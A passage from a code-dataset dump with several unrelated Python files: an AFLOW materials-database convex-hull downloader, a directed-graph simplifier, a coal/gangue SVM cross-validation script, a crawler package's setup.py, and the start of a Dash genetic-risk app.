Phases[x[0]]\n print('{:6.2f} {:12s}'.format(x[1]*100, phases))\n if prettycom == \"\":\n prettycom = '{:6.2f}*{}'.format(x[1]*100, phases)\n else:\n prettycom += ' +' + '{:6.2f}*{}'.format(x[1]*100, phases)\n \n print(\"\\n\", formula, \" is made of \", prettycom, \"\\n\")\n\ndef setoutdir(pdir):\n if pdir==\"\":\n pdir = \"MP\"\n i = 0\n posdir = pdir + str(i)\n #print ( os.path.isdir(posdir), os.path.isfile(posdir), os.path.exists(posdir) )\n while ( os.path.exists(posdir) ):\n i += 1\n posdir = pdir + str(i)\n os.mkdir(posdir)\n elif (os.path.isdir(pdir)):\n posdir = pdir\n elif os.path.isfile(pdir):\n print(\"file with the same name exist! please give another name!\")\n sys.exit(1)\n elif not os.path.exists(pdir):\n posdir = pdir\n os.mkdir(posdir)\n return posdir+\"/\"\n\n\n\"\"\"output POSCAR, INCAR, KPOINTS and stability of each download structure\nposdir - dir for files to be outputted into\ndstack - data stack contain all information, such as phasename, energy, elements, etc\ncalhull - bool to instruct if calculatiing convex hull\nehull - how high above the hull the structures will be included in the output\nreturn:\n\"\"\"\ndef outMPdata(posdir, _dstack, calhull, ehull):\n KPOINTS = ['KPOINTS.relax2', 'KPOINTS.relax1', 'KPOINTS.relax', 'KPOINTS.static']\n CONTCARS = ['CONTCAR.relax2', 'CONTCAR.relax1', 'CONTCAR.relax', 'CONTCAR.relax.vasp', 'POSCAR.bands', 'POSCAR.orig']\n print (\"Compound Formula SG Symmetry Pearson Prototype Tenergy(eV/atom) Fenergy : Primitive POSCAR\")\n dstack = []\n for ff in _dstack:\n if ff[\"hull_energy\"] < 1.e-6:\n dstack.append(ff)\n for ff in _dstack:\n if not ff[\"hull_energy\"] < 1.e-6:\n dstack.append(ff)\n\n for ff in dstack:\n if not outelement(ff[\"elements\"]) : continue\n pname = ff[\"phasename\"]\n energy = ff[\"energy\"]\n entry = ff[\"entry\"]\n\n #sys.stdout.write ('{} Secs. '.format(round(time.time()-startime,3)))\n if (not calhull):\n sys.stdout.write(\"{} {} {} {} {:.6f}\\n\".format(ff[\"pretty_formula\"], ff[\"elements\"], ff[\"composition\"], pname, energy))\n else:\n eh = ff[\"hull_energy\"]\n ef = ff[\"formation_energy\"]\n if eh < ehull:\n if eh < ehullthr:\n if preload:\n try:\n poscarfile = webget(ff[\"entry\"],CONTCARS,KPOINTS,ff)\n sys.stdout.write(\" {:11.6f} {:10.6f} : \".format(energy,ef))\n except:\n traceback.print_exc()\n sys.stdout.write(\"{:<16s} {:11.6f} {:10.6f} : \".format(pname, energy, ef))\n if eh > 0.0000005: sys.stdout.write(\"{:.6f} above hull {}, \".format(eh,ff[\"hull\"]))\n sys.stdout.write(\"{}\\n\".format(poscarfile))\n continue\n else:\n sys.stdout.write(\"{:<16s} {:3d} {:12s} {:7s} {:<22s} {:11.6f} {:10.6f} : \".format(pname, ff[\"spacegroup\"], ff[\"sg2\"].split(' ')[0], ff[\"Pearson_symbol\"], ff[\"prototype\"],energy, ef))\n if eh > 0.0000005: sys.stdout.write(\"{:.6f} above hull {}, \".format(eh,ff[\"hull\"]))\n else:\n poscarfile = \"\"\n if preload:\n try:\n poscarfile = webget(ff[\"entry\"],CONTCARS,KPOINTS,ff)\n sys.stdout.write(\" {:11.6f} {:10.6f} {:.6f} above hull : \".format(energy,ef,eh))\n except:\n sys.stdout.write(\"{:<16s} {:11.6f} {:10.6f} {:.6f} above hull : \".format(pname, energy, ef, eh))\n if eh > 0.0000005: sys.stdout.write(\"{:.6f} above hull {}, \".format(eh,ff[\"hull\"]))\n sys.stdout.write(\"{}\\n\".format(poscarfile))\n continue\n else:\n sys.stdout.write(\"{:<16s} {:3d} {:12s} {:7s} {:<22s} {:11.6f} {:10.6f} {:.6f} above hull : \".format(pname, ff[\"spacegroup\"], ff[\"sg2\"].split(' ')[0], ff[\"Pearson_symbol\"], ff[\"prototype\"],energy, ef, eh))\n if eh > 0.0000005: sys.stdout.write(\"{:.6f} above hull {}, \".format(eh,ff[\"hull\"]))\n else:\n continue\n\n spname = ff[\"phasename\"]+'+'+ff[\"sg2\"].split(' ')[0].replace('{','').replace('}','').replace('/','').replace('_','')+'+'+ff[\"prototype\"]+'+'+str(ff[\"spacegroup\"])+'+'+ff[\"afid\"]\n for cc in KPOINTS:\n try:\n entry.files[cc](posdir + spname + \".KPOINTS\")\n except:\n \"\"\" cannot find CONTCAR cc from entry, goto web download \"\"\"\n kpoints = str(entry)+'/'+cc\n ret = requests.head(kpoints)\n if ret.status_code >= 400 : continue\n urllib.request.urlretrieve(kpoints, posdir + spname + \".KPOINTS\")\n break\n\n found = False\n for cc in CONTCARS:\n try:\n lines = entry.files[cc]()\n lines = lines.split('\\n')\n lines = [k for k in lines if k != '']\n except:\n \"\"\" cannot find CONTCAR cc from entry, goto web download \"\"\"\n contcar = str(entry)+'/'+cc\n ret = requests.head(contcar)\n if ret.status_code >= 400 : continue\n req = urllib.request.Request(contcar)\n blines = urlopen(req).readlines()\n lines = []\n for bb,bline in enumerate(blines):\n lines.append(bline.decode(\"utf-8\").strip())\n\n with open(posdir + spname + \".VASP\", 'w') as f0:\n for l in range(0,5):\n f0.write(\"{}\\n\".format(lines[l]))\n f0.write(\" {}\\n\".format(ff[\"elements\"]))\n natom = sum(ff[\"composition\"])\n for l in range(5,7+natom):\n f0.write(\"{}\\n\".format(lines[l]))\n print(posdir + spname + \".VASP\")\n found = True\n kustoutfiles(posdir + spname + \".VASP\")\n break\n\n if not found :\n print(\"WARNING! CONTCAR not FOUND\", str(entry))\n #aflow_missing(entry)\n\n \"\"\"\n with open(pname+\".POTCAR\",'w') as f0:\n f0.write(\"{}\\n\".format(ff[\"POTCAR\"]))\n\n with open(pname+\".INCAR\",'w') as f0:\n incar = ff[\"INCAR\"]\n for key, value in incar.items() :\n f0.write(\"{}= \".format(key))\n if type(value) is list:\n for v in value:\n f0.write(\"{} \".format(v))\n elif type(value) is bool:\n f0.write(\".{}.\".format(value))\n else:\n f0.write(\"{}\".format(value))\n f0.write(\"\\n\")\n \"\"\"\n print()\n\n\"\"\"combine elemental symbol and phase composition into a string\nElements -\ncompistion -\nreturn:\n\"\"\"\ndef getPhCom(Elements,composition):\n decompose = \" \"\n for e,c in enumerate(composition):\n if (c == 1.0):\n decompose = Elements[e]\n break\n else:\n decompose = decompose + frac(c)+Elements[e]\n return(decompose.replace(\" +\",\"\"))\n\nstartime = time.time()\ntotaltime = 0\n\n\"\"\"unit conversion\"\"\"\neVtoGPa = 160.21766208\neVtoJ = 96486.9\npreload = False\nwithin = ['Pt', 'Ni', 'Cr']\nwithin = ['Co', 'Yb', 'Mn', 'Sb']\nwithin = ['Pt', 'Ir', 'Rh', 'Ni', 'Zr', 'Hf', 'Si', 'Cr']\ncontain = []\n\"\"\"handle command line option\"\"\"\n\nfastcode = True #\"\"\" key to cotrol the search method\"\"\"\n#periodictable = [key for key,value in MM_of_Elements.items()] #\"\"\" list of all elements from the periodic table\"\"\"\nperiodictable = MM_of_Elements.keys() #\"\"\" list of all elements from the periodic table\"\"\"\nehullthr = 1.e-4\nehull = ehullthr\ncalhull = False #\"\"\" key to cotrol the if calculating the convex hull\"\"\"\nsuspend = []\n\ninput_within = False #\"\"\" key to cotrol the within input\"\"\"\ninput_wCom = False #\"\"\" key to cotrol the within input\"\"\"\ninput_contain = False #\"\"\" key to cotrol the contain input\"\"\"\nformula_within = \"\" #\"\"\"chemical formula\"\"\"\nformula_wCom = \"\" #\"\"\"chemical formula\"\"\"\nformula_contain = \"\" #\"\"\"chemical formula\"\"\"\ncontainoperator = \"$all\" #contain any elements within the list of contain\ndft_type = \"PAW_PBE\"\nquaternary = False\nallpot = False\nvasppot = False\naflowpot = True\ndeltaH = False\nallstr = False\nKUST0 = \"SSS/\"\n\ncount = 1\nwhile (count < len(sys.argv)):\n if (sys.argv[count] == \"-within\"):\n \"\"\"for code developing test\"\"\"\n within = ['Fe', 'Ni']\n within = ['Pt', 'Ir', 'Rh', 'Ni', 'Zr', 'Hf', 'Si', 'Cr']\n within = ['Fe', 'Ni', 'Al', 'C', 'Co', 'Cr', 'Cu', 'Hf', 'Mn', 'Mo', 'Nb', 'Re', 'Si', 'Ta', 'Ti', 'W']\n input_within = True\n input_contain = False\n input_wCom = False\n elif (sys.argv[count] == \"-preload\"):\n preload = not preload\n elif (sys.argv[count] == \"-kust\"):\n count = count + 1\n if (count >= len(sys.argv)):\n break\n KUST0 = sys.argv[count].replace('/','') + '/'\n elif (sys.argv[count] == \"-allstr\"):\n allstr = not allstr\n elif (sys.argv[count] == \"-allpot\"):\n allpot = not allpot\n elif (sys.argv[count] == \"-vasppot\"):\n vasppot = not vasppot\n elif (sys.argv[count] == \"-aflowpot\"):\n aflowpot = not aflowpot\n elif (sys.argv[count] == \"-deltaH\"):\n deltaH = not deltaH\n elif (sys.argv[count] == \"-wCom\"):\n input_wCom = True\n input_within = False\n input_contain = False\n elif (sys.argv[count] == \"-containall\"):\n containoperator = \"$all\"\n input_contain = True\n input_within = False\n input_wCom = False\n elif (sys.argv[count] == \"-containany\"):\n containoperator = \"$in\"\n input_contain = True\n input_within = False\n input_wCom = False\n elif (sys.argv[count] == \"-fastcode\"):\n fastcode = not fastcode\n elif (sys.argv[count] == \"-suspend\"):\n count = count + 1\n if (count >= len(sys.argv)):\n break\n suspend.append(sys.argv[count])\n elif (sys.argv[count] == \"-ehull\"):\n count = count + 1\n if (count >= len(sys.argv)):\n break\n ehull = float(sys.argv[count])\n elif (sys.argv[count] == \"-ehullthr\"):\n count = count + 1\n if (count >= len(sys.argv)):\n break\n ehullthr = float(sys.argv[count])\n elif (input_within):\n formula_within = formula_within+sys.argv[count]\n elif (input_wCom):\n formula_wCom = formula_wCom+sys.argv[count]\n elif (input_contain):\n formula_contain = formula_contain+sys.argv[count]\n else:\n print (\"************* UNKOWN option\",'\"',sys.argv[count],'\"')\n sys.exit(1)\n count = count + 1\n\nsignal.signal(signal.SIGINT, signal_handler)\ndef kustdirlist():\n if not os.path.exists(KUST0):\n os.mkdir(KUST0)\n list = os.listdir(KUST0)\n list = [i for i in list if i.endswith('.VASP')]\n return list\n\ndef kustoutfiles(spname):\n ff0 = spname.split('/')[1].split('+')\n ff0 = ff0[0]+'+'+ff0[1]\n for file in kustfiles:\n if file.startswith(ff0) : return\n\n ff0 = spname.split('/')[0]+'/'\n shutil.copy(spname, spname.replace(ff0,KUST0))\n\nkustfiles = kustdirlist()\n\nposdir = setoutdir(\"AF0\")\nif formula_within==\"\":\n for el in within:\n formula_within += el\nif formula_wCom!=\"\":\n within,compos_within = wCom2composition(formula_wCom)\nif formula_within!=\"\":\n within,compos_within = formula2composition(formula_within)\nif formula_contain!=\"\":\n contain,compos_contain = formula2composition(formula_contain)\n\nnentries = 0\nallrec = {}\n\nmissing_data = []\nif os.path.exists(\"aflow_missing.json\") :\n with open(\"aflow_missing.json\", encoding='utf-8') as json_file:\n missing_data = json.load(json_file)\n\nif aflowpot:\n \"\"\"\n with open(\"download_code.json\", encoding='utf-8') as json_file:\n code_data = json.load(json_file)\n with open(\"download_dft_type.json\", encoding='utf-8') as json_file:\n dft_data = json.load(json_file)\n with open(\"download_pp.json\", encoding='utf-8') as json_file:\n pp_data = json.load(json_file)\n with open(\"download_efa.json\", encoding='utf-8') as json_file:\n efa_data = json.load(json_file)\n for i,rec in enumerate(code_data):\n if rec.get(\"aurl\")!=dft_data[i].get(\"aurl\") :\n print (\"ERROR!\",rec.get(\"aurl\"),\"not equal to\", dft_data[i].get(\"aurl\"))\n sys.exit()\n code_data[i][\"dft_type\"] = dft_data[i].get(\"dft_type\")\n for i,rec in enumerate(pp_data):\n if rec.get(\"aurl\")!=dft_data[i].get(\"aurl\") :\n print (\"ERROR!\",rec.get(\"aurl\"),\"not equal to\", dft_data[i].get(\"aurl\"))\n sys.exit()\n code_data[i][\"species_pp\"] = rec.get(\"species_pp\")\n for i,rec in enumerate(efa_data):\n if rec.get(\"aurl\")!=dft_data[i].get(\"aurl\") :\n print (\"ERROR!\",rec.get(\"aurl\"),\"not equal to\", dft_data[i].get(\"aurl\"))\n sys.exit()\n code_data[i][\"enthalpy_formation_atom\"] = rec.get(\"enthalpy_formation_atom\")\n with open(\"download_spacegroup_relax.json\", encoding='utf-8') as json_file:\n efa_data = json.load(json_file)\n for i,rec in enumerate(efa_data):\n if rec.get(\"aurl\")!=dft_data[i].get(\"aurl\") :\n print (\"ERROR!\",rec.get(\"aurl\"),\"not equal to\", dft_data[i].get(\"aurl\"))\n sys.exit()\n code_data[i][\"spacegroup_relax\"] = rec.get(\"spacegroup_relax\")\n with open('aflow.json', 'w') as outfile:\n json.dump(code_data, outfile)\n sys.exit()\n \"\"\"\n\n with open(\"aflow.json\", encoding='utf-8') as json_file:\n data = json.load(json_file)\n if not vasppot: aflowPotSet()\n\nrunPot = vaspPot.values()\n\nif preload:\n entries = []\n otherPot = []\n for i,rec in enumerate(data):\n if not rec.get(\"code\").startswith(\"vasp\") : continue\n if rec.get(\"dft_type\")!=\"PAW_PBE\" : continue\n spc = rec.get(\"species\").replace(\"'\",\"\").split(\",\")\n if all(elem in within for elem in spc) :\n if allpot: entries.append(rec)\n else:\n elp = rec.get(\"species_pp\").split(\",\")\n if all(elem in runPot for elem in elp) :\n entries.append(rec)\n else:\n for el in elp:\n if el not in runPot:\n if el not in otherPot:\n otherPot.append(el)\n if not allpot: print(\"\\n other Potential found\", otherPot, \"\\n\")\n nentries = len(entries)\n \n for entry in entries:\n try:\n els,composition = formula2nat(entry.get(\"compound\"))\n prettycompound = prety_formula(els,composition)\n if deltaH:\n energy_atom = entry.get(\"enthalpy_formation_atom\")\n if energy_atom is None: continue\n if not isfloat(energy_atom): continue\n \"\"\"\n if (len(els)==1) and (float(energy_atom)<0.0) : \n print(entry)\n continue\n \"\"\"\n else:\n energy_atom = entry.get(\"energy_atom\")\n\n #print(energy_atom)\n link = \"http://\"+entry.get(\"aurl\").replace(\"duke.edu:\",\"duke.edu/\")\n if link in missing_data: continue\n \"\"\"\n ret = requests.head(link)\n if ret.status_code >= 400 : continue #error in AFLOW, link not exist\n \"\"\"\n\n afid = entry[\"auid\"].replace(':','-')\n if ehull <= ehullthr:\n if prettycompound in allrec.keys():\n if float(energy_atom) >= float(allrec.get(prettycompound)[0]) : continue\n arec = [float(energy_atom), link, els, composition, entry.get(\"compound\"),prettycompound,afid]\n allrec.update({prettycompound:arec})\n else:\n compound_spacegroup = entry.get(\"compound\")+\"_\"+entry.get(\"spacegroup_relax\")\n if compound_spacegroup in allrec.keys():\n if float(energy_atom) >= float(allrec.get(compound_spacegroup)[0]) : continue\n arec = [float(energy_atom), link, els, composition, entry.get(\"compound\"),prettycompound,afid]\n allrec.update({compound_spacegroup:arec})\n \"\"\"\n else:\n arec = [float(energy_atom), link, els, composition, entry.get(\"compound\"),prettycompound]\n allrec.update({link:arec})\n \"\"\"\n except:\n traceback.print_exc()\n pass\n\n if deltaH: \n for kk in allrec.keys():\n rr = allrec.get(kk)\n if len(rr[2])==1 :\n rr[0] = -0.000000001\n allrec[kk] = rr\n \"\"\"\n \"\"\"\n\n sys.stdout.write ('{} + {} Secs. '.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n if len(allrec) != 0:\n sys.stdout.write('{} compounds found from {} AFLOW entries\\n'.format(len(allrec),len(data)))\n\n dstack = []\n for kk in allrec.keys():\n line = allrec.get(kk)\n drec = {\"pretty_formula\":line[5], \"entry\":line[1], \"elements\":' '.join(line[2]), \"phasename\":allrec.get(kk)[4], \"composition\":line[3], \"energy\":line[0], \"afid\":afid}\n dstack.append(drec)\n hstack,dstack = convexhull(dstack,fastcode)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n outMPdata(posdir, dstack, True, ehull)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n if formula_within!=\"\":\n calcphasedecompostion(hstack,formula_within,within,compos_within)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n print(nentries,\" entries processed. Total time cost=\",round(time.time()-startime,3),\"\\n\")\n\nelse:\n for i1,el1 in enumerate(within):\n allrec.update(downloads((K.nspecies == 1) & (K.species==el1)))\n for i2,el2 in enumerate(within):\n if i2 <= i1: continue\n allrec.update(downloads((K.nspecies == 2) & ((K.species==el1) & (K.species==el2))))\n for i3,el3 in enumerate(within):\n if i3 <= i2: continue\n allrec.update(downloads((K.nspecies == 3) & (((K.species==el1) & (K.species==el2)) & (K.species==el3))))\n if not quaternary : continue\n for i4,el4 in enumerate(within):\n if i4 <= i3: continue\n allrec.update(downloads((K.nspecies == 4) & ((((K.species==el1) & (K.species==el2)) & (K.species==el3)) & (K.species==el4))))\n\n dstack = []\n for kk in allrec.keys():\n line = allrec.get(kk)\n #print (line)\n #drec = {\"pretty_formula\":kk, \"entry\":line[1], \"elements\":' '.join(line[2]), \"phasename\":allrec.get(kk)[4], \"composition\":line[3], \"energy\":line[0], \"Pearson_symbol\":line[8], \"prototype\":line[9],\"sg2\":line[10][0],\"spacegroup\":line[11]}\n drec = {\"pretty_formula\":kk, \"entry\":line[1], \"elements\":' '.join(line[2]), \"phasename\":allrec.get(kk)[4], \"composition\":line[3], \"energy\":line[0], \"Pearson_symbol\":line[8], \"prototype\":line[9],\"sg2\":line[10][0],\"spacegroup\":line[11], \"afid\":line[12].replace(\":\",\"-\")}\n dstack.append(drec)\n\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n hstack,dstack = convexhull(dstack,fastcode)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n outMPdata(posdir, dstack, True, ehull)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n\n if formula_within!=\"\":\n calcphasedecompostion(hstack,formula_within,within,compos_within)\n sys.stdout.write ('{} + {} Secs.\\n\\n'.format(round(totaltime,3), round(time.time()-startime -totaltime,3)))\n totaltime = time.time()-startime\n print(nentries,\" entries processed. Total time cost=\",round(time.time()-startime,3),\"\\n\")\n#http://aflowlib.duke.edu/search/API/?species(!Pu),energy_atom,dft_type,$paging(0)\n#http://aflowlib.duke.edu/search/API/?species(!Pu),energy_atom,code,$paging(0)\n#http://aflowlib.duke.edu/AFLOWDATA/LIB3_RAW/CoMg_pvSi/TFCC010.ABChttp://aflowlib.duke.edu/AFLOWDATA/LIB3_RAW/CoMg_pvSi/TFCC010.ABC#http://aflowlib.duke.edu/search/API/?species(!Pu),enthalpy_formation_atom,$paging(0)\n","sub_path":"hbin/pycode/afconvex.py","file_name":"afconvex.py","file_ext":"py","file_size_in_byte":40753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"456229","text":"import fileinput\r\n\r\n\r\nclass DirectedGraph:\r\n def __init__(self):\r\n self.adjIn = [] # adjacency-list of input vertices\r\n self.adjOut = [] # adjacency-list of output vertices\r\n self.index = {} # dictionary to convert symbol to index\r\n self.symbol = [] # array to convert index to symbol\r\n self.V = 0 # count of vertices in graph (including lazy-deleted nodes)\r\n\r\n def addEdge(self, v, w):\r\n if v not in self.index:\r\n self.addVertex(v)\r\n\r\n if w not in self.index:\r\n self.addVertex(w)\r\n\r\n if w in self.adjacentOutOf(v):\r\n return # do not allow parallel edges\r\n\r\n vi = self.index[v]\r\n wi = self.index[w]\r\n\r\n self.adjOut[vi].append(wi)\r\n self.adjIn[wi].append(vi)\r\n\r\n def addVertex(self, v):\r\n if v in self.index:\r\n return\r\n\r\n self.index[v] = self.V\r\n self.symbol.append(v)\r\n self.V += 1\r\n self.adjIn.append([])\r\n self.adjOut.append([])\r\n\r\n def removeVertex(self, v):\r\n vi = self.index.pop(v)\r\n # lazy delete to avoid shifting index values\r\n self.symbol[vi] = None\r\n\r\n for inNeighbor in self.adjIn[vi]:\r\n self.adjOut[inNeighbor].remove(vi)\r\n self.adjIn[vi] = None\r\n\r\n for outNeighbor in self.adjOut[vi]:\r\n self.adjIn[outNeighbor].remove(vi)\r\n self.adjOut[vi] = None\r\n\r\n def adjacentOutOf(self, v):\r\n vi = self.index[v]\r\n return [self.symbol[x] for x in self.adjOut[vi]]\r\n\r\n def adjacentInTo(self, v):\r\n vi = self.index[v]\r\n return [self.symbol[x] for x in self.adjIn[vi]]\r\n\r\n def indegree(self, v):\r\n vi = self.index[v]\r\n return len(self.adjIn[vi])\r\n\r\n def outdegree(self, v):\r\n vi = self.index[v]\r\n return len(self.adjOut[vi])\r\n\r\n def vertices(self):\r\n return self.index.keys()\r\n\r\n def __str__(self):\r\n result = \"\"\r\n for vs in self.vertices():\r\n indegree = self.indegree(vs)\r\n outdegree = self.outdegree(vs)\r\n adjacent = ', '.join(self.adjacentOutOf(vs))\r\n result += \"{} ({}, {}): {}\\n\".format(vs, indegree, outdegree, adjacent)\r\n return result.strip(\"\\n\")\r\n\r\n\r\ndef get(lst, index, default=None):\r\n try:\r\n return lst[index]\r\n except IndexError:\r\n return default\r\n\r\n\r\nclass Remover:\r\n def __init__(self, digraph):\r\n self.digraph = digraph\r\n\r\n verticesToEliminate = []\r\n # must iterate twice to differentiate isolated vertices and vertices that turn isolated after removing adjacent\r\n for vs in digraph.vertices():\r\n if digraph.indegree(vs) == 1 and digraph.outdegree(vs) == 1:\r\n verticesToEliminate.append(vs)\r\n\r\n for vs in verticesToEliminate:\r\n inNeighbor = get(digraph.adjacentInTo(vs), 0, None)\r\n outNeighbor = get(digraph.adjacentOutOf(vs), 0, None)\r\n\r\n digraph.removeVertex(vs)\r\n\r\n if inNeighbor is not outNeighbor:\r\n digraph.addEdge(inNeighbor, outNeighbor)\r\n\r\n\r\ngraph = DirectedGraph()\r\nfor line in fileinput.input():\r\n v, w = line.strip().split('\\t')\r\n graph.addEdge(v, w)\r\n\r\nRemover(graph)\r\nfor v in graph.vertices():\r\n for w in graph.adjacentOutOf(v):\r\n print(\"{}\\t{}\".format(v, w))\r\n","sub_path":"mysolution.py","file_name":"mysolution.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"308138668","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport time\nimport mylib\nimport PreProcessing as pp\nimport FeatExtraction as fe\nimport SupVecMech as mysvm\n\n\n# 简单画个图\ndef Visualize(num): # 可以尝试在柱状图上带数据\n x = range(6)\n plt.xlim(-1, 6)\n plt.ylim(0.5, 1)\n plt.xticks(range(6), np.linspace(0, 6, 6, dtype=int))\n plt.ylabel(\"Precision\")\n plt.xlabel(\"Group No.\")\n plt.title(\"Precision of Cross-Validation\")\n plt.bar(x, num)\n plt.show()\n\n\n# 生成训练、测试数据集\ndef GenSet(times, iteration):\n print(\"分组:\" + str(times))\n\n coal_prefix = 'D:\\\\coal-gangue\\\\selected\\\\coal\\\\'\n gangue_prefix = 'D:\\\\coal-gangue\\\\selected\\\\gangue\\\\'\n coal_num = 184\n gangue_num = 182\n\n suffix = '.jpg'\n train = []\n label = []\n testset = []\n for i in range(coal_num):\n path = coal_prefix + str(i) + suffix\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n img = pp.prep(img)\n # 这里使用了区域关系重采样做插值\n #img = cv2.resize(img, (150, 150), interpolation=cv2.INTER_AREA)\n if i % iteration != times:\n train.append(fe.Rotation_invariant_LBP(img))\n label.append(\"coal\")\n else:\n t0 = time.time()\n tmp = [i, fe.Rotation_invariant_LBP(img), \"coal\"]\n t1 = time.time()\n tmp.append(t1 - t0)\n testset.append(tmp)\n for i in range(gangue_num):\n path = gangue_prefix + str(i) + suffix\n img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n img = pp.prep(img)\n # 这里使用了区域关系重采样做插值\n #img = cv2.resize(img, (150, 150), interpolation=cv2.INTER_AREA)\n if i % iteration != times:\n train.append(fe.Rotation_invariant_LBP(img))\n label.append(\"gangue\")\n else:\n t0 = time.time()\n tmp = [i, fe.Rotation_invariant_LBP(img), \"gangue\"]\n t1 = time.time()\n tmp.append(t1 - t0)\n testset.append(tmp)\n print(str(times) + \"分组完成!\")\n return np.asarray(train), np.asarray(label), testset\n\n\n# 计算每一次交叉检验的准确率\ndef CalcPre(clf, test):\n cnt = 0\n for i in range(len(test)):\n tmp = [test[i][0], test[i][2], test[i][3]]\n flag = False\n t0 = time.time()\n if clf.predict([test[i][1]]) == test[i][2]:\n cnt += 1\n flag = True\n t1 = time.time()\n tmp[2] += t1 - t0\n tmp.append(flag)\n mylib.record('418_lbp', tmp)\n print(\"准确率计算完成\")\n return cnt / len(test)\n\n\ndef CrossVld():\n precision = []\n iteration = 6\n for i in range(iteration):\n train, label, testset = GenSet(i, iteration)\n clf = mysvm.Train(train, label)\n precision.append(CalcPre(clf, testset))\n return precision","sub_path":"CrsVldt.py","file_name":"CrsVldt.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"34223413","text":"from setuptools import setup\nfrom setuptools import find_packages\n\nimport re\nimport os\n\n\ndef get_release():\n regexp = re.compile(r\"^__version__\\W*=\\W*'([\\d.abrc]+)'\")\n root = os.path.dirname(__file__)\n init_py = os.path.join(root, 'aiodcard', '__init__.py')\n with open(init_py) as f:\n for line in f:\n match = regexp.match(line)\n if match is not None:\n return match.group(1)\n else:\n raise RuntimeError('Cannot find version in aiodcard/__init__.py')\n\n\nsetup(\n name='aiodcard',\n description='Dcard crawler using asyncio(coroutine)',\n long_description=open('README.rst').read(),\n version=get_release(),\n author='carlcarl',\n author_email='carlcarlking@gmail.com',\n url='https://github.com/carlcarl/aiodcard',\n packages=find_packages(),\n license='MIT',\n package_data={\n },\n entry_points={\n },\n keywords=['dcard', 'crawler', 'coroutine'],\n\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX',\n 'Operating System :: Unix',\n 'Programming Language :: Python :: 3 :: Only',\n 'Topic :: Software Development :: Libraries',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"289794400","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\n\nimport plotly.graph_objects as go\n\nfrom app import app\n\nimport pandas as pd\nimport numpy as np\nimport scipy.stats as stats\nfrom scipy.stats import norm\nfrom statistics import NormalDist\n\ndf1 = pd.read_csv('https://raw.githubusercontent.com/Genes-N-Risks/genocode/master/app/multi_page/Polygenic%20Risk%20Scores%20Data.csv')\n\nscore = {}\nfor i in range(df1.shape[0]):\n if df1.phenotype[i] in score.keys():\n score[df1.phenotype[i]].append(df1.score[i])\n else:\n score[df1.phenotype[i]] = []\n score[df1.phenotype[i]].append(df1.score[i])\n\namean = {}\nfor i in range(df1.shape[0]):\n if df1.phenotype[i] in amean.keys():\n amean[df1.phenotype[i]].append(df1.means[i])\n else:\n amean[df1.phenotype[i]] = []\n amean[df1.phenotype[i]].append(df1.means[i])\n\nastdev = {}\nfor i in range(df1.shape[0]):\n if df1.phenotype[i] in astdev.keys():\n astdev[df1.phenotype[i]].append(df1.sdev[i])\n else:\n astdev[df1.phenotype[i]] = []\n astdev[df1.phenotype[i]].append(df1.sdev[i])\n\ndf = pd.read_csv('Genetic Data.csv')\n\noptions={'BMI':[],\n 'T2D':[]}\n\nfor i in range(df.shape[0]):\n if df.gene[i] in options[df.phenotype[i]]:\n continue\n else:\n options[df.phenotype[i]].append(df.gene[i])\n\nmeans = {}\nfor i in range(df.shape[0]):\n if df.gene[i] in means.keys():\n means[df.gene[i]].append(df.means[i])\n else:\n means[df.gene[i]] = []\n means[df.gene[i]].append(df.means[i])\n\nstdevs = {}\nfor i in range(df.shape[0]):\n if df.gene[i] in stdevs.keys():\n stdevs[df.gene[i]].append(df.sdev[i])\n else:\n stdevs[df.gene[i]] = []\n stdevs[df.gene[i]].append(df.sdev[i])\n\ngenotype = {}\nfor i in range(df.shape[0]):\n if df.gene[i] in genotype.keys():\n genotype[df.gene[i]].append(df.genotype[i])\n else:\n genotype[df.gene[i]] = []\n genotype[df.gene[i]].append(df.genotype[i])\n\nxlabel = {'BMI':'Obesity Genetic Score', 'T2D':'Glucose Genetic Score'}\nylabel = {'BMI':'BMI(kg/m2)', 'T2D':'Fasting glucose(mg/dl)'}\n\nlayout = html.Div([\n html.H3('Statistic data'),\n\n dcc.Dropdown(\n id='disease-dropdown',\n options=[{'label': k, 'value': k} for k in options.keys()],\n value = 'BMI'\n ),\n\n html.Hr(),\n\n dcc.Dropdown(id='snps-dropdown'),\n\n html.Hr(),\n\n\n html.Div(id='stat-display-value'),\n\n dcc.Link('Analyze my own genetic test result', href='consent')\n])\n\n\n@app.callback(\n Output('snps-dropdown', 'options'),\n [Input('disease-dropdown', 'value')])\ndef set_snps_options(selected_disease):\n return [{'label': i, 'value': i} for i in options[selected_disease]]\n\n\n@app.callback(\n Output('snps-dropdown', 'value'),\n [Input('snps-dropdown', 